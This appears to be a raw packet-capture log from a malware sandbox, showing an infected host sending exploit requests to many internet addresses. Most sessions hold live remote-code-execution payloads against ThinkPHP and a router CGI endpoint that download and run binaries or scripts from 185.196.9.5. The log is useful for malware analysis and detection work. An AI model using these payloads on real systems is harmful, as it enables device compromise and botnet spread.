489	192.168.2.15	51452	95.111.242.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.643765926 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:43.831485033 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 25 Feb 2024 18:03:43 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
490	192.168.2.15	35650	95.164.249.62	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.660370111 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
491	192.168.2.15	34694	95.68.13.165	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.666277885 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:44.183480978 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
492	192.168.2.15	59732	95.163.240.39	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.669996023 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:43.883681059 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:43 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
493	192.168.2.15	53988	95.82.201.18	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.701018095 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:43.945754051 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:43 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
494	192.168.2.15	50442	95.57.209.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.725656033 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:43.995495081 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:03:43.996503115 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
495	192.168.2.15	40006	85.245.197.73	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.739125013 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
496	192.168.2.15	54124	94.187.104.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.758315086 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
497	192.168.2.15	58442	94.123.137.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.765721083 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
498	192.168.2.15	47380	31.200.111.40	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.767251015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
499	192.168.2.15	60588	94.123.40.191	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.776459932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
500	192.168.2.15	52016	88.208.213.61	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.816617012 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:43.996037960 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:43 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
501	192.168.2.15	34322	88.99.210.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.821173906 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:44.005862951 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:43 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:03:44.005882978 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:03:44.005916119 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:03:44.005933046 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:03:44.005951881 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:03:44.005970955 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Feb 25, 2024 19:03:44.005990028 CET	1096	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:03:44.006011009 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to d1.esecretary-wish.gr's <a href="mailto:support@cy
Feb 25, 2024 19:03:44.006028891 CET	351	IN	Data Raw: 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e Data Ascii: utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 c

Session ID	Source IP	Source Port	Destination IP	Destination Port
502	192.168.2.15	43870	88.193.138.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.880986929 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
503	192.168.2.15	39736	31.136.238.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:43.920931101 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:44.485882998 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:45.605789900 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:47.941764116 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
